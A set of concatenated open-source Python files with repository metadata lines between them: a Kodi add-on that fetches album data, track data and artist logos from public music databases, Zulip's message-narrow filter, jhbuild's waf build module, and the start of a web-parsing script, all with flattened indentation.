except:
AlbumDescription = None
dict11[albumkeydata] = None
pass
try:
AlbumReview = ['album'][0]['strReview']
dict12[albumkeydata] = AlbumReview.encode( 'utf-8' )
except:
AlbumReview = None
dict12[albumkeydata] = None
try:
WINDOW.setProperty("srh.RecordLabel",dict8[albumkeydata])
log("record label set to [%s]" % dict8[albumkeydata])
except:
WINDOW.setProperty("srh.RecordLabel","")
log("No record label found for this album")
pass
if AlbumDescription:
log("Album Description - %s" % AlbumDescription.encode('utf-8'))
if AlbumReview:
log("Album Review - %s" %AlbumReview.encode('utf-8'))
if RealAlbumThumb:
log("real album thumb found! path is %s" % RealAlbumThumb)
if RealCDArt:
log("Real cd art found! path is %s" % RealCDArt)
albumdatasize = len(dict8)
log("Album data cache is size %d" % albumdatasize)
return RealAlbumThumb, RealCDArt, AlbumDescription, AlbumReview
def get_year(artist, track, dict1, dict2, dict3, dict7, already_checked, counts):
"""
Look in local cache for album and year data corresponding to current track and artist.
Return the local data if present, unless it is older than 7 days in which case re-lookup online.
If data not present in cache, lookup online and add to cache
If all data present in cache, just return that and don't lookup anything online.
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'get_year' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
lun = False
if (artist == "") and (track == ""):
return True, None,None,None
log("Looking up album and year data for artist %s and track %s" %(artist, track), xbmc.LOGDEBUG)
my_size = len(dict1)
log("Cache currently holds %d tracks" % my_size, xbmc.LOGDEBUG)
keydata = artist.replace(" ","").lower() + track.replace(" ","").lower()
log("keydata is %s" % keydata, xbmc.LOGDEBUG)
if keydata in dict1 and already_checked == False :
log("Track %s in local data cache" % track, xbmc.LOGDEBUG)
albumname = dict1[keydata]
log("Album Name is %s" % albumname, xbmc.LOGDEBUG)
datechecked = dict3[keydata]
try:
trackinfo = dict7[keydata]
log("Track info is [%s]" % trackinfo, xbmc.LOGDEBUG)
except Exception as e:
log("Updating info for track [%s]" % track, xbmc.LOGDEBUG)
lun = True
dict1[keydata], dict2[keydata], dict7[keydata] = tadb_trackdata(artist, track, dict1, dict2, dict3, dict7, counts)
dict3[keydata] = datetime.datetime.combine(datetime.date.today(), datetime.datetime.min.time())
log("Data for track '%s' on album '%s' last checked %s" % (track, dict1[keydata], str(datechecked.strftime("%d-%m-%Y"))), xbmc.LOGDEBUG)
if (datechecked < (todays_date - time_diff)) or (xbmcvfs.exists(logostring + "refreshdata")):
log( "Data might need refreshing", xbmc.LOGDEBUG)
if ((dict1[keydata] == '') or (dict1[keydata] == None) or (dict1[keydata] == 'None') or (dict1[keydata] == 'null') or (xbmcvfs.exists(logostring + "refreshdata"))) and (lun == False):
log("No album data - checking TADB again [%s]" % lun, xbmc.LOGDEBUG)
dict1[keydata], dict2[keydata], dict7[keydata] = tadb_trackdata(artist, track, dict1, dict2, dict3, dict7, counts)
dict3[keydata] = datetime.datetime.combine(datetime.date.today(),datetime.datetime.min.time())
log("Data refreshed")
elif ((dict2[keydata] == None) or (dict2[keydata] == '0') or (dict2[keydata] == '')) and (lun == False):
log("No year data for album %s - checking TADB again [%s]" % (dict1[keydata], lun), xbmc.LOGDEBUG)
dict1[keydata], dict2[keydata], dict7[keydata] = tadb_trackdata(artist, track, dict1, dict2, dict3, dict7, counts)
dict3[keydata] = datetime.datetime.combine(datetime.date.today(),datetime.datetime.min.time())
log("Data refreshed", xbmc.LOGDEBUG)
elif ((dict7[keydata] == None) or (dict7[keydata] == "None") or (dict7[keydata] == "")) and (lun == False): # don't lookup again if we have just done it (Line 196)
log("No text data for track - re-checking TADB [%s]" % lun, xbmc.LOGDEBUG)
dict1[keydata], dict2[keydata], dict7[keydata] = tadb_trackdata(artist,track,dict1,dict2,dict3, dict7, counts)
dict3[keydata] = datetime.datetime.combine(datetime.date.today(),datetime.datetime.min.time())
elif lun == True:
log("Track data just looked up. No need to refresh other data right now!", xbmc.LOGDEBUG)
else:
log( "All data present - No need to refresh", xbmc.LOGDEBUG)
return True, dict1[keydata], dict2[keydata], dict7[keydata]
else:
log( "Using cached data", xbmc.LOGDEBUG )
return True, dict1[keydata],dict2[keydata], dict7[keydata]
elif already_checked == False:
log("New track - get data for %s : %s" %(artist, track), xbmc.LOGDEBUG)
dict1[keydata], dict2[keydata], dict7[keydata] = tadb_trackdata(artist,track,dict1,dict2,dict3, dict7, counts)
dict3[keydata] = datetime.datetime.combine(datetime.date.today(),datetime.datetime.min.time())
log( "New data has been cached", xbmc.LOGDEBUG)
return True, dict1[keydata], dict2[keydata], dict7[keydata]
def tadb_trackdata(artist,track,dict1,dict2,dict3, dict7, counts):
"""
Searches theaudiodb for an album containing track. If a album is found, attempts
to get the year of the album. Returns album name and year if both are found, just the album name if
no year is found, or none if nothing is found
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'tadb_trackdata' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
trackinfo = None
searchartist = artist.replace(" ","+").encode('utf-8')
searchtrack = track.replace(" ","+").encode('utf-8')
searchtrack = searchtrack.replace("&","and")
searchtrack = searchtrack.rstrip("+")
if "(Radio Edit)" in searchtrack:
searchtrack = searchtrack.replace("(Radio Edit)","").strip() # remove 'radio edit' from track name
if "(Live)" in searchtrack:
searchtrack = searchtrack.replace("(Live)","").strip()
if "(live" in searchtrack:
searchtrack = searchtrack.replace("(live", "").replace(")", "").strip()
if "+&+" in searchtrack:
searchtrack = searchtrack.replace("+&+"," and ").strip()
url = 'https://www.theaudiodb.com/api/v1/json/%s' % rusty_gate.decode( 'base64' )
searchurl = url + '/searchtrack.php?s=' + searchartist + '&t=' + searchtrack
log("Search artist, track with strings : %s,%s" %(searchartist,searchtrack), xbmc.LOGDEBUG)
keydata = artist.replace(" ","").lower() + track.replace(" ","").lower()
if keydata in dict1: # seen this artist/track before
if keydata in dict7: # already possibly have some track info
if dict7[keydata] is not None:
log("Using cached data & not looking anything up online", xbmc.LOGDEBUG)
return dict1[keydata], dict2[keydata], dict7[keydata]
try:
try:
response = load_url(searchurl)
if response:
searching = _json.loads(response)
except ValueError:
log("No json data to parse !!",xbmc.LOGERROR)
searching = []
try:
album_title = searching['track'][0]['strAlbum']
except:
album_title = None
pass
try:
tadb_albumid = searching['track'][0]['idAlbum']
except:
tadb_albumid = None
pass
trackinfo = None
try:
trackinfo = searching['track'][0]['strDescriptionEN']
except:
trackinfo = None
log('No track info from TADB', xbmc.LOGDEBUG)
pass
if (trackinfo is not None) and (len (trackinfo) > 3) :
dict7[keydata] = trackinfo
else:
trackinfo = None
log("Not found any track data so far, continuing search on lastFM", xbmc.LOGDEBUG)
if trackinfo is None :
lastfmurl = "http://ws.audioscrobbler.com/2.0/?method=track.getInfo&api_key=%s" % happy_hippo.decode( 'base64' )
lastfmurl = lastfmurl+'&artist='+searchartist+'&track='+searchtrack+'&format=json'
log("LastFM url is [%s] " % lastfmurl, xbmc.LOGDEBUG)
try:
response = load_url(lastfmurl)
stuff = _json.loads(response)
searching = stuff['track']
log("Searching from last.fm is [%s]" % searching)
except Exception as e:
searching = [] # no track info from last.fm
pass
if 'wiki' in searching:
try:
trackinfo = searching['wiki']['content']
except:
pass
try:
trackinfo = searching['wiki']['summary']
except:
pass
if trackinfo:
trackinfo = clean_string(trackinfo)
log("Trackinfo - [%s]" % trackinfo, xbmc.LOGDEBUG)
if trackinfo is not None and len(trackinfo) < 3:
log ("No track info found", xbmc.LOGDEBUG)
trackinfo = None
else:
log("No track info found on lastFM", xbmc.LOGDEBUG)
if trackinfo:
counts['new_track_info'] += 1
if keydata:
dict7[keydata] = trackinfo
if (album_title == "") or (album_title == "null") or (album_title == None):
log("No album data found on TADB ", xbmc.LOGDEBUG)
log("trying to use LastFM data", xbmc.LOGDEBUG)
try:
if searching:
album_title = searching['album']['title']
log("Album title [%s]" % album_title, xbmc.LOGDEBUG)
except Exception as e:
album_title = None
log("No album title", xbmc.LOGDEBUG)
pass
if album_title is not None:
album_title_search = album_title.replace(" ","+").encode('utf-8')
searchurl = url + '/searchalbum.php?s=' + searchartist + '&a=' + album_title_search
log("Search artist,album with strings : %s,%s" %(searchartist,album_title_search), xbmc.LOGDEBUG)
response = load_url(searchurl)
try:
searching = _json.loads(response)
the_year = "null"
except ValueError:
log("No JSON from TADB - Site down ??", xbmc.LOGERROR)
searching = []
the_year = "null"
try:
the_year = searching['album'][0]['intYearReleased']
except:
pass
if (the_year == "") or (the_year == "null"):
log("No year found for album", xbmc.LOGDEBUG)
return album_title, None, dict7[keydata]
log("Got '%s' as the year for '%s'" % ( the_year, album_title), xbmc.LOGDEBUG)
log("keydata is set to %s " % keydata, xbmc.LOGDEBUG)
if keydata in dict7:
return album_title, the_year, dict7[keydata]
else:
return album_title, the_year, None
else:
log("No album title to use as lookup - returning Null values")
if keydata in dict7:
return None, None, dict7[keydata]
else:
return None, None, None
except IOError:
log("Timeout connecting to TADB", xbmc.LOGERROR)
if keydata in dict1 and keydata in dict7:
return dict1[keydata], dict2[keydata], dict7[keydata]
elif keydata in dict1 and keydata not in dict7:
return dict1[keydata], dict2[keydata], None
else:
return None, None, None
except Exception as e:
log("Error searching theaudiodb for album and year data [ %s ]" % str(e), xbmc.LOGERROR)
exc_type, exc_value, exc_traceback = sys.exc_info()
log(repr(traceback.format_exception(exc_type, exc_value,exc_traceback)), xbmc.LOGERROR)
if keydata in dict1 and keydata in dict7:
return dict1[keydata], dict2[keydata], dict7[keydata]
elif keydata in dict1:
return dict1[keydata], dict2[keydata], None
else:
return None, None, None
def get_mbid(artist, track, dict6, dict3, counts):
"""
Gets the MBID for a given artist name.
Note that radio stations often omit 'The' from band names so this may return the wrong MBID
Returns the Artist MBID or a self generated one if the lookup fails and we haven't cached one previously
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'get_mbid' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
log("Getting mbid for artist %s " % artist, xbmc.LOGDEBUG)
em_mbid = str(uuid.uuid5(uuid.NAMESPACE_DNS, artist.encode('utf-8'))) # generate an emergency mbid in case lookup fails
keydata = artist.replace(" ","").lower() + track.replace(" ","").lower()
try:
try:
datechecked = dict3[keydata]
except: # no keydata (new artist/track combo probably) still might have artist mbid cached
datechecked = todays_date # set date to today (use cached mbid if there is one)
if not ((datechecked < (todays_date - time_diff)) or (xbmcvfs.exists(logostring + "refreshdata"))):
if artist in dict6:
log("Using cached MBID for artist [%s]" % artist, xbmc.LOGDEBUG)
return dict6[artist]
xbmc.sleep(500) # wait a little to avoid hitting musicbrainz too heavily
url = 'https://musicbrainz.org/ws/2/artist/?query=artist:%s&fmt=json' % urllib.quote(artist.encode('utf-8'))
# 'https://musicbrainz.org/ws/2/artist/?query=artist:%s' % temp_artist
response = urllib.urlopen(url).read()
if (response == '') or ("MusicBrainz web server" in response):
log("Unable to contact Musicbrainz to get an MBID", xbmc.LOGERROR)
log("using %s as emergency MBID" % em_mbid)
return em_mbid
# index1 = response.find("artist id")
# index2 = response.find("type")
# mbid = response[index1+11:index2-2].strip()
# if '"' in mbid:
# mbid = mbid.strip('"')
# if len(mbid )> 36:
# mbid = mbid[0:36]
mb_data = _json.loads(response)
artist_name = mb_data['artists'][0]['name']
score = mb_data['artists'][0]['score']
if score > 95:
mbid = mb_data['artists'][0]['id']
log('Got an MBID of : %s' % mbid, xbmc.LOGDEBUG)
if mbid == '':
log("Didn't get an MBID for artist : %s" % artist, xbmc.LOGDEBUG)
log("using %s as emergency MBID" % em_mbid)
return em_mbid
if artist not in dict6:
log("Caching mbid [%s] for artist [%s]" %(mbid, artist), xbmc.LOGDEBUG)
dict6[artist] = mbid
counts['new_artists'] += 1
elif (artist in dict6 and mbid != dict6[artist]):
dict6[artist] = mbid
return mbid
except Exception as e:
log ("There was an error getting the Musicbrainz ID [ %s ]" % str(e), xbmc.LOGERROR)
exc_type, exc_value, exc_traceback = sys.exc_info()
log(repr(traceback.format_exception(exc_type, exc_value,exc_traceback)), xbmc.LOGERROR)
return em_mbid
def check_cached_logo(logopath, url):
if (not xbmcvfs.exists(logopath)) and url:
xbmcvfs.mkdir(logopath)
log("Created directory [%s] to download logo from [%s]" %( logopath, url), xbmc.LOGDEBUG)
logopath = download_logo(logopath, url, "tadb")
return logopath
else:
logopath = logopath + 'logo.png'
logopath = xbmc.validatePath(logopath)
if xbmcvfs.exists(logopath):
log("Logo has already been downloaded and is in cache. Path is %s" % logopath, xbmc.LOGDEBUG)
return logopath
else:
log("No local logo and no cached logo", xbmc.LOGDEBUG)
return None
def get_hdlogo(mbid, artist):
"""
Get the first found HD clearlogo from fanart.tv if it exists.
Args:
The MBID of the artist and the artist name
Returns :
The fully qualified path to an existing logo or newly downloaded logo or
None if the logo is not found
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'get_hdlogo' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
try:
if checked_all_artists == False:
url = "https://fanart.tv/artist/" + mbid
logopath = logostring + mbid + "/logo.png"
logopath = xbmc.validatePath(logopath)
if not xbmcvfs.exists(logopath):
log("Searching for HD logo on fanart.tv", xbmc.LOGDEBUG)
response = urllib.urlopen(url).read()
if response == '':
log("No response from fanart.tv", xbmc.LOGDEBUG)
return None
index1 = response.find("<h2>HD ClearLOGO<div")
if index1 != -1:
index2 = response.find('<div class="image_options">',index1)
anylogos = response[index1:index2]
if "currently no images" in anylogos:
log("No HD logos found for %s" % artist, xbmc.LOGDEBUG)
return None
index3= response.find('<a href="/api/download.php?type=download')
index4 = response.find('class="btn btn-inverse download"')
chop = response[index3+9:index4-2]
url = "https://fanart.tv" + chop
logopath = logostring + mbid + '/'
logopath = xbmc.ValidatePath(logopath)
xbmcvfs.mkdir(logopath)
logopath = download_logo(logopath,url)
return logopath
else:
logopath = logostring + mbid + '/logo.png'
logopath = xbmc.validatePath(logopath)
if xbmcvfs.exists(logopath):
log("Logo downloaded previously", xbmc.LOGDEBUG)
return logopath
else:
log("No logo found on fanart.tv", xbmc.LOGDEBUG)
return None
else:
logopath = logostring + mbid + '/logo.png'
logopath = xbmc.validatePath(logopath)
if xbmcvfs.exists(logopath):
log("Logo downloaded previously", xbmc.LOGDEBUG)
return logopath
else:
log("No logo in cache for %s " % artist, xbmc.LOGDEBUG)
return None
except:
log("Error searching fanart.tv for a logo", xbmc.LOGERROR)
exc_type, exc_value, exc_traceback = sys.exc_info()
log(repr(traceback.format_exception(exc_type, exc_value,exc_traceback)), xbmc.LOGERROR)
return None
def search_tadb( local_logo, mbid, artist, dict4, dict5,checked_all_artists):
"""
Checks to see if there is an existing logo locally in the scripts addon_data directory.
If not, attempts to find a logo on theaudiodb and download it into the cache. As radio stations often
drop 'The' from band names (eg 'Who' for 'The Who', 'Kinks' for 'The Kinks') if we fail to find a match
for the artist we try again with 'The ' in front of the artist name
Finally we do a search with the MBID we previously obtained
Args:
mbid - the mbid from musicbrainz
artist - name of the artist to search for
dict4 - dictionary of banner URL's
dict5 - dictionary of thumbnail URL's
returns:
artist - artist name
logopath - full path to downloaded logo
URL1 - URL to artist banner on TADB
URL2 - URL to artist thumb on TADB
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'search_tadb' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
logopath = ''
url = ''
response = None
log("Looking up %s on tadb.com" % artist, xbmc.LOGDEBUG)
searchartist = artist.replace( " ", "+" )
log ("[search_tadb] : searchartist = %s" % searchartist)
tadburl = 'https://www.theaudiodb.com/api/v1/json/%s' % rusty_gate.decode( 'base64' )
searchurl = tadburl + '/search.php?s=' + (searchartist.encode('utf-8'))
log("URL for TADB is : %s" % searchurl, xbmc.LOGDEBUG)
response = load_url(searchurl)
log(str(response))
if (response == '{"artists":null}') or (response == '') or ('!DOCTYPE' in response) or (response == None):
searchartist = 'The+' + searchartist
tadburl = 'https://www.theaudiodb.com/api/v1/json/%s' % rusty_gate.decode( 'base64' )
searchurl = tadburl + '/search.php?s=' + (searchartist.encode('utf-8'))
log("Looking up %s on tadb.com with URL %s" % (searchartist, searchurl), xbmc.LOGDEBUG)
response = load_url(searchurl)
log(response, xbmc.LOGDEBUG)
if (response == '{"artists":null}') or (response == '') or ('!DOCTYPE' in response) or (response == None):
log("Artist not found on tadb", xbmc.LOGDEBUG)
# Lookup failed on name - try with MBID
log("Looking up with MBID", xbmc.LOGDEBUG)
tadburl = 'https://www.theaudiodb.com/api/v1/json/%s' % rusty_gate.decode( 'base64' )
searchurl = tadburl + '/artist-mb.php?i=' + mbid
log("MBID URL is : %s" % searchurl, xbmc.LOGDEBUG)
response = load_url(searchurl)
if not response:
log("Failed to find any artist info on theaudiodb", xbmc.LOGDEBUG)
return artist, None, None, None
if response is not None:
searching = _json.loads(response)
artist, url, dict4, dict5, mbid = parse_data(artist, searching, searchartist, dict4, dict5, mbid)
if url and (not local_logo):
log("No local logo", xbmc.LOGDEBUG)
logopath = logostring + mbid + '/'
logopath = xbmc.validatePath(logopath)
logopath = check_cached_logo (logopath, url)
else:
logopath = logostring + mbid + '/'
logopath = xbmc.validatePath(logopath)
logopath = check_cached_logo (logopath, url)
if searchartist in dict4:
return artist, logopath, dict4[searchartist], dict5[searchartist]
else:
return artist, logopath, None, None
def parse_data(artist, searching, searchartist, dict4, dict5, mbid):
"""
Parse the JSON data for the values we want
Also checks the artist name is correct if the first two lookups on TADB failed
and corrects it if possible
"""
log("----------------------------------------------------", xbmc.LOGDEBUG)
log(" Entered routine 'parse_data' ", xbmc.LOGDEBUG)
log("----------------------------------------------------", xbmc.LOGDEBUG)
checkartist = ''
try:
try:
if searching['artists'][0]['strArtist']:
checkartist = searching['artists'][0]['strArtist']
except:
log("No artist found on tadb for %s. JSON data is %s" % ( artist, searching), xbmc.LOGDEBUG)
log("checkartist is [%s], searchartist is [%s], artist is [%s]" %(checkartist, searchartist, artist), xbmc.LOGDEBUG)
if (checkartist.replace(' ','+') != searchartist) and (artist !="P!nk"):
if checkartist != '':
log("Updated artist name (%s) with data from tadb [%s]" % (artist, checkartist), xbmc.LOGDEBUG)
artist = checkartist
try:
_artist_thumb = searching['artists'][0]['strArtistThumb']
except:
log("error getting artist thumb", xbmc.LOGDEBUG)
_artist_thumb = None
pass
try:
_artist_banner = searching['artists'][0]['strArtistBanner']
except:
log("error getting artist banner", xbmc.LOGDEBUG)
_artist_banner = None
pass
log("Artist Banner - %s" % _artist_banner, xbmc.LOGDEBUG)
log("Artist Thumb - %s" % _artist_thumb, xbmc.LOGDEBUG)
if (_artist_thumb == "") or (_artist_thumb == "null") or (_artist_thumb == None):
log("No artist thumb found for %s" % searchartist, xbmc.LOGDEBUG)
_artist_thumb = None
if (_artist_banner == "") or (_artist_banner == "null") or (_artist_banner == None):
log("No artist banner found for %s" % searchartist, xbmc.LOGDEBUG)
_artist_banner = None
if searchartist not in dict4:
dict4[searchartist] = _artist_thumb
if searchartist not in dict5:
dict5[searchartist] = _artist_banner
try:
chop = searching['artists'][0]['strArtistLogo']
if (chop == "") or (chop == "null"):
log("No logo found on tadb", xbmc.LOGDEBUG)
chop = None
except:
log("No logo data found", xbmc.LOGDEBUG)
chop = None
pass
try:
check_mbid = searching['artists'][0]['strMusicBrainzID']
if (mbid != check_mbid) and (check_mbid != 'null'):
log("Updated mbid from [%s] to [%s]" %(mbid, check_mbid), xbmc.LOGDEBUG)
mbid = check_mbid
except:
log("Unable to check mbid", xbmc.LOGDEBUG)
pass
return artist, chop, dict4, dict5, mbid
except Exception as e:
log("[Parse_Data] error [%s]" %str(e), xbmc.LOGERROR)
exc_type, exc_value, exc_traceback = sys.exc_info()
log(repr(traceback.format_exception(exc_type, exc_value,exc_traceback)),xbmc.LOGERROR)
return artist, url, dict4, dict5, mbid
def get_lastfm_info(lastfm_username):
"""
Looks up the currently playing track on BBC Radio (1:2) on last.fm as the BBC scrobble their tracks to it
Always returns a single artist name with any featured artists appended to the track name
"""
lastfmurl = "http://ws.audioscrobbler.com/2.0/?method=user.getrecenttracks&user=%s" % lastfm_username
lastfmurl = lastfmurl +"&api_key=%s" % happy_hippo.decode( 'base64' )
lastfmurl = lastfmurl + "&format=json&limit=1"
try:
_featuredartists = []
response = load_url(lastfmurl)
stuff = _json.loads(response)
if stuff.has_key('message'):
log("Error getting data from last.fm", xbmc.LOGERROR)
log("%s" %str(stuff), xbmc.LOGERROR)
return ''
track = stuff['recenttracks']['track'][0]['name']
artist = stuff['recenttracks']['track'][0]['artist']['#text']
if 'feat. ' in track: # got at least one featured artist
_f=track.find('feat.') # remove the () around featured artist(s)
_s=track.rfind(')')
temptrack=track[:_f-2]
temptrack2=track[_f:_s]
track = temptrack + " " + temptrack2
track=track.replace('feat.','~').replace(' & ',' ~ ')
_featuredartists=track.split('~')
track=_featuredartists[0].strip()
del _featuredartists[0]
artist=artist.replace(', ',' & ')
for _artists in range(0,len(_featuredartists)):
artist = artist + " & " + _featuredartists[_artists].strip()
# log("last.fm INFO - GOT [%s] - [%s]" %(track, artist), xbmc.LOGINFO)
if isinstance(artist, str):
artist = artist.decode('utf-8')
if isinstance(track, str):
track = track.decode('utf-8')
return track + ' - ' + artist
except Exception as e:
log("[get_lastfm_info] error [%s] " %str(e), xbmc.LOGERROR)
return ''
def get_cached_info(mbid, testpath, local_logo, searchartist, dict4, dict5):
log("Testpath is [%s]" % testpath)
cache_path = logostring + mbid + '/'
log("Cache path is [%s]" %cache_path)
logopath = None
if not local_logo:
logopath = check_cached_logo(cache_path, None)
if searchartist in dict4:
return logopath, dict4[searchartist], dict5[searchartist]
else:
return logopath, None, None
def get_remaining_cache(artist, track, dict1, dict2, dict7):
keydata = artist.replace(" ","").lower() + track.replace(" ","").lower()
if keydata in dict1:
albumtitle = dict1[keydata]
else:
albumtitle = None
try:
albumyear = dict2[keydata]
except:
albumyear = None
pass
try:
trackinfo = dict7[keydata]
except:
trackinfo = None
pass
return True, albumtitle, albumyear, trackinfo
def split_artists(artist):
if artist.lower() == 'y&t':
return 'y & t'
searchartist = artist.replace(' feat. ', ' ~ ').replace(' ft. ', ' ~ ').replace(' Ft. ', ' ~ ').replace(' feat ', ' ~ ').replace(' ft ', ' ~ ').replace(' Feat ', ' ~ ').replace(' Feat. ', ' ~ ')
searchartist = searchartist.replace(' & ', ' ~ ').replace(' and ', ' ~ ').replace(' And ', ' ~ ').replace(' ~ the ', ' and the ').replace(' ~ The ',
' and The ').replace(' , ', ' ~ ')
searchartist = searchartist.replace(' vs ', ' ~ ').replace(', ', ' ~ ')
return searchartist
def slice_string(string1, string2, n):
if string2 == "" or string2 is None:
return -1
start = string1.find(string2)
while start >= 0 and n > 1:
start = string1.find(string2, start + len(string2))
n -= 1
return start
def set_timer(delay):
cs = datetime.datetime.now().time().second
et = cs + delay
if (et) >= 60:
et = et - 60
return et
class RepeatedTimer(object):
"""Auto-starting threaded timer. Used for auto-saving the dictionary data
to file every 15 minutes while the addon is running.
Call as follows :-
rt = RepeatingTimer(interval in secs, function name to call, params for function called)
"""
def __init__(self, interval, function, *args, **kwargs):
self._timer = None
self.interval = interval
self.function = function
self.args = args
self.kwargs = kwargs
self.is_running = False
self.start()
def _run(self):
self.is_running = False
self.start()
self.function(*self.args, **self.kwargs)
def start(self):
if not self.is_running:
self._timer = Timer(self.interval, self._run)
self._timer.start()
self.is_running = True
def stop(self):
self._timer.cancel()
self.is_running = False
| gpl-3.0 |
esander91/zulip | zerver/lib/narrow.py | 123 | 1633 | from zerver.decorator import JsonableError
def check_supported_events_narrow_filter(narrow):
for element in narrow:
operator = element[0]
if operator not in ["stream", "topic", "sender", "is"]:
raise JsonableError("Operator %s not supported." % (operator,))
def build_narrow_filter(narrow):
check_supported_events_narrow_filter(narrow)
def narrow_filter(event):
message = event["message"]
flags = event["flags"]
for element in narrow:
operator = element[0]
operand = element[1]
if operator == "stream":
if message["type"] != "stream":
return False
if operand.lower() != message["display_recipient"].lower():
return False
elif operator == "topic":
if message["type"] != "stream":
return False
if operand.lower() != message["subject"].lower():
return False
elif operator == "sender":
if operand.lower() != message["sender_email"].lower():
return False
elif operator == "is" and operand == "private":
if message["type"] != "private":
return False
elif operator == "is" and operand in ["starred"]:
if operand not in flags:
return False
elif operator == "is" and operand in ["alerted", "mentioned"]:
if "mentioned" not in flags:
return False
return True
return narrow_filter
| apache-2.0 |
bboozzoo/jhbuild | jhbuild/modtypes/waf.py | 5 | 6424 | # jhbuild - a tool to ease building collections of source packages
# Copyright (C) 2001-2006 James Henstridge
# Copyright (C) 2007 Gustavo Carneiro
# Copyright (C) 2008 Frederic Peters
#
# waf.py: waf module type definitions.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
__metaclass__ = type
import os
import re
from jhbuild.errors import FatalError, BuildStateError, CommandError
from jhbuild.modtypes import \
Package, DownloadableModule, register_module_type
from jhbuild.commands.sanitycheck import inpath
__all__ = [ 'WafModule' ]
class WafModule(Package, DownloadableModule):
'''Base type for modules that are distributed with a WAF script.'''
type = 'waf'
PHASE_CHECKOUT = DownloadableModule.PHASE_CHECKOUT
PHASE_FORCE_CHECKOUT = DownloadableModule.PHASE_FORCE_CHECKOUT
PHASE_CLEAN = 'clean'
PHASE_CONFIGURE = 'configure'
PHASE_BUILD = 'build'
PHASE_CHECK = 'check'
PHASE_DIST = 'dist'
PHASE_INSTALL = 'install'
def __init__(self, name, branch=None, waf_cmd='./waf', python_cmd='python'):
Package.__init__(self, name, branch=branch)
self.waf_cmd = waf_cmd
self.python_cmd = python_cmd
self.supports_install_destdir = True
def get_srcdir(self, buildscript):
return self.branch.srcdir
def get_builddir(self, buildscript):
return self.get_srcdir(buildscript)
def skip_configure(self, buildscript, last_phase):
# don't skip this stage if we got here from one of the
# following phases:
if last_phase in [self.PHASE_FORCE_CHECKOUT,
self.PHASE_CLEAN,
self.PHASE_BUILD,
self.PHASE_INSTALL]:
return False
# skip if the .lock-wscript file exists and we don't have the
# alwaysautogen flag turned on:
builddir = self.get_builddir(buildscript)
return (os.path.exists(os.path.join(builddir, '.lock-wscript')) and
not buildscript.config.alwaysautogen)
def do_configure(self, buildscript):
builddir = self.get_builddir(buildscript)
buildscript.set_action(_('Configuring'), self)
if buildscript.config.buildroot and not os.path.exists(builddir):
os.makedirs(builddir)
cmd = [self.waf_cmd, 'configure', '--prefix', buildscript.config.prefix]
buildscript.execute(cmd, cwd=builddir, extra_env={'PYTHON': self.python_cmd})
do_configure.depends = [PHASE_CHECKOUT]
do_configure.error_phases = [PHASE_FORCE_CHECKOUT]
def do_clean(self, buildscript):
buildscript.set_action(_('Cleaning'), self)
cmd = [self.waf_cmd, 'clean']
buildscript.execute(cmd, cwd=self.get_builddir(buildscript),
extra_env={'PYTHON': self.python_cmd})
do_clean.depends = [PHASE_CONFIGURE]
do_clean.error_phases = [PHASE_FORCE_CHECKOUT, PHASE_CONFIGURE]
def do_build(self, buildscript):
buildscript.set_action(_('Building'), self)
cmd = [self.waf_cmd, 'build']
if self.supports_parallel_build:
cmd.append('-j')
cmd.append('%s' % (buildscript.config.jobs, ))
buildscript.execute(cmd, cwd=self.get_builddir(buildscript),
extra_env={'PYTHON': self.python_cmd})
do_build.depends = [PHASE_CONFIGURE]
do_build.error_phases = [PHASE_FORCE_CHECKOUT, PHASE_CONFIGURE]
def skip_check(self, buildscript, last_phase):
if self.name in buildscript.config.module_makecheck:
return not buildscript.config.module_makecheck[self.name]
if 'check' not in buildscript.config.build_targets:
return True
return False
def do_check(self, buildscript):
buildscript.set_action(_('Checking'), self)
cmd = [self.waf_cmd, 'check']
try:
buildscript.execute(cmd, cwd=self.get_builddir(buildscript),
extra_env={'PYTHON': self.python_cmd})
except CommandError:
if not buildscript.config.makecheck_advisory:
raise
do_check.depends = [PHASE_BUILD]
do_check.error_phases = [PHASE_FORCE_CHECKOUT, PHASE_CONFIGURE]
def do_dist(self, buildscript):
buildscript.set_action(_('Creating tarball for'), self)
if buildscript.config.makedistcheck:
cmd = [self.waf_cmd, 'distcheck']
else:
cmd = [self.waf_cmd, 'dist']
buildscript.execute(cmd, cwd=self.get_builddir(buildscript),
extra_env={'PYTHON': self.python_cmd})
do_dist.depends = [PHASE_BUILD]
do_dist.error_phases = [PHASE_FORCE_CHECKOUT, PHASE_CONFIGURE]
def do_install(self, buildscript):
buildscript.set_action(_('Installing'), self)
destdir = self.prepare_installroot(buildscript)
cmd = [self.waf_cmd, 'install', '--destdir', destdir]
buildscript.execute(cmd, cwd=self.get_builddir(buildscript),
extra_env={'PYTHON': self.python_cmd})
self.process_install(buildscript, self.get_revision())
do_install.depends = [PHASE_BUILD]
def xml_tag_and_attrs(self):
return 'waf', [('id', 'name', None),
('waf-command', 'waf_cmd', 'waf')]
def parse_waf(node, config, uri, repositories, default_repo):
instance = WafModule.parse_from_xml(node, config, uri, repositories, default_repo)
if node.hasAttribute('waf-command'):
instance.waf_cmd = node.getAttribute('waf-command')
if node.hasAttribute('python-command'):
instance.python_cmd = node.getAttribute('python-command')
return instance
register_module_type('waf', parse_waf)
| gpl-2.0 |
torch1/OpenParser | openparser/parse.py | 1 | 8551 | from bs4 import BeautifulSoup
import bs4
import requests
import re
import sys
import json
from urlparse import urljoin, urlparse
from Queue import Queue
